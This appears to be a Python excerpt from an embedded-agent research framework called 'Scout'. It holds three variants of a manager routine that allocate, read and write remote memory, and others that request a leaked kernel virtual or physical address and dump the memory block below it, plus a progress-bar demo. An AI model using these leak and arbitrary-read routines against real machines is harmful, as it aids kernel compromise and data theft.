def startManage(sock_fd, logger):
    """Exercise the embedded Scout agent's memory primitives end to end.

    Sequence, as issued over ``sock_fd`` via ``sendInstr``:

    1. ``instrAlloc(0x100)`` - the reply is the buffer address, decoded as one
       little-endian value whose width follows ``isBitness32()`` (4 or 8 bytes).
    2. ``instrMemRead(addr, 0x100)`` - the untouched buffer, hex-dumped indented.
    3. ``instrMemWrite(addr + 0x70, b"Scout was here!")`` - a marker written
       into the buffer.
    4. ``instrMemRead(addr, 0x100)`` again - the modified buffer, hex-dumped.

    Args:
        sock_fd: connection handle forwarded unchanged to ``sendInstr``.
        logger: progress sink; must provide ``info``, ``addIndent`` and
            ``removeIndent``.

    Returns:
        None.

    Raises:
        struct.error: if the allocation reply is not exactly one address wide.
            The agent's replies are otherwise trusted as-is; this length check
            is the only validation performed here.
    """
    def dump_indented(heading, buf):
        # Shared shape for the two buffer dumps: heading, indented hex dump.
        logger.info(heading)
        logger.addIndent()
        logger.info(hexDump(buf))
        logger.removeIndent()

    logger.info('Starting to manage the embedded Scout')

    logger.info('Allocating a remote memory buffer')
    alloc_reply = sendInstr(sock_fd, instrAlloc(0x100), logger)
    # Width of the returned address depends on the target's bitness.
    addr_fmt = "<L" if isBitness32() else "<Q"
    (buffer_addr,) = struct.unpack(addr_fmt, alloc_reply)
    logger.info('The buffer was allocated at address: 0x%012x', buffer_addr)

    logger.info('Reading from the just allocated memory')
    content = sendInstr(sock_fd, instrMemRead(buffer_addr, 0x100), logger)
    dump_indented('The default content of the buffer is:', content)

    logger.info("Writing to the allocated memory")
    sendInstr(sock_fd, instrMemWrite(buffer_addr + 0x70, b"Scout was here!"), logger)

    logger.info('Reading again from the same memory address')
    content = sendInstr(sock_fd, instrMemRead(buffer_addr, 0x100), logger)
    dump_indented('The updated content of the buffer is:', content)
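def startManage(sock_fd, logger):
    """Ask the proxy for a leaked kernel address and dump the block below it.

    Issues ``instrLeakAddr()`` over ``sock_fd`` via ``sendInstr`` and decodes the
    reply as one little-endian 64-bit value.  It then issues a 256-byte
    ``instrMemRead`` from the 0x1000-aligned block that precedes the leaked
    address and hex-dumps the reply, indented under a heading, when the read
    returned data.

    Args:
        sock_fd: connection handle forwarded unchanged to ``sendInstr``.
        logger: progress sink; must provide ``info``, ``addIndent`` and
            ``removeIndent``.

    Returns:
        None.

    Raises:
        struct.error: if the Leak reply is not exactly 8 bytes.  The proxy's
            replies are otherwise trusted as-is; this length check is the only
            validation performed here.
    """
    logger.info('Starting to manage the proxy')

    logger.info('Sending the Leak instruction')
    data = sendInstr(sock_fd, instrLeakAddr(), logger)
    leaked_addr = struct.unpack("<Q", data)[0]
    # Pass the value as a lazy %-argument (as the sibling startManage variants
    # do) rather than pre-rendering the string with the % operator.
    logger.info("The leaked kernel address is: %016x", leaked_addr)

    logger.info('Sending the memory read instruction')
    # 0xFFFFFFFFFFFFF000: clears the low 12 bits, i.e. rounds down to a 0x1000
    # boundary after stepping one 0x1000 block below the leaked address.
    page_mask = (1 << 64) - 0x1000
    read_from = (leaked_addr - 0x1000) & page_mask
    data = sendInstr(sock_fd, instrMemRead(read_from, 256), logger)
    # Only dump when the read actually returned something (same guard the
    # physical-read variant uses) instead of handing an empty/None reply to
    # hexDump.
    if data:
        logger.info("The leaked data is:")
        logger.addIndent()
        logger.info(hexDump(data))
        logger.removeIndent()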
def startManage(sock_fd, logger):
    """Ask the proxy for a leaked virtual/physical address pair and dump the block below it.

    The ``instrLeakAddr()`` reply is decoded as two little-endian 64-bit values,
    virtual address first, physical second.  A 256-byte ``instrPhyRead`` is then
    issued from the 0x1000-aligned block that precedes the leaked physical
    address; the reply, if non-empty, is hex-dumped indented under a heading.

    Args:
        sock_fd: connection handle forwarded unchanged to ``sendInstr``.
        logger: progress sink; must provide ``info``, ``addIndent`` and
            ``removeIndent``.

    Returns:
        None.

    Raises:
        struct.error: if the Leak reply is not exactly 16 bytes.  The proxy's
            replies are otherwise trusted as-is; this length check is the only
            validation performed here.
    """
    def hexdump_under(heading, buf):
        logger.info(heading)
        logger.addIndent()
        logger.info(hexDump(buf))
        logger.removeIndent()

    # 0xFFFFFFFFFFFFF000: clears the low 12 bits (rounds down to a 0x1000 boundary).
    page_mask = (1 << 64) - 0x1000

    logger.info('Starting to manage the proxy')

    logger.info('Sending the Leak instruction')
    leak_reply = sendInstr(sock_fd, instrLeakAddr(), logger)
    virt_addr, phys_addr = struct.unpack('<QQ', leak_reply)
    logger.info('The leaked kernel virtual address is: 0x%016x', virt_addr)
    logger.info('The leaked kernel physical address is: 0x%016x', phys_addr)

    logger.info('Sending the memory read instruction')
    read_from = (phys_addr - 0x1000) & page_mask
    block = sendInstr(sock_fd, instrPhyRead(read_from, 256), logger)
    if not block:
        # Nothing came back from the physical read; there is nothing to dump.
        return
    hexdump_under('The leaked data is:', block)
# Tail of a demo script for the prompt / ProgressBar helpers.  The names it
# relies on (s, prompt, TOOL_NAME, ProgressBar, hexDump, time) are bound
# earlier, outside this excerpt.
time.sleep(0.1)
s.finish()  # presumably an earlier progress bar created before this excerpt - confirm
prompt.warning("The tool only supports 32 bit")
prompt.info("Activating tool %s", TOOL_NAME)
# Second bar: 250 steps, width 30; the trailing True and time_format are passed
# straight through to ProgressBar - their meaning is not visible here.
p = ProgressBar('Leaked %3d / %3d bytes - %3d%% Completed', 250, 30, True, time_format="Elapsed %M:%S -")
p.start()
# The sleeps only simulate work.  The advances sum to 352, more than the bar's
# 250 steps - TODO confirm ProgressBar clamps at its size.
p.advance(1)
time.sleep(2)
p.advance(50)
time.sleep(1.5)
p.advance(100)
time.sleep(2)
p.advance(1)
time.sleep(0.5)
p.advance(200)
p.finish()
prompt.debug("The leaked data is:")
prompt.addIndent()
# NOTE(review): the startManage variants hand hexDump a bytes reply (it is
# struct-unpacked there); this passes a str of chr(0..249) - confirm hexDump
# accepts str input under Python 3.
prompt.debug(hexDump("".join(map(chr, range(250)))))
prompt.removeIndent()
prompt.removeIndent()  # second pop presumably balances an addIndent made before this excerpt - confirm
prompt.info("Successful finish")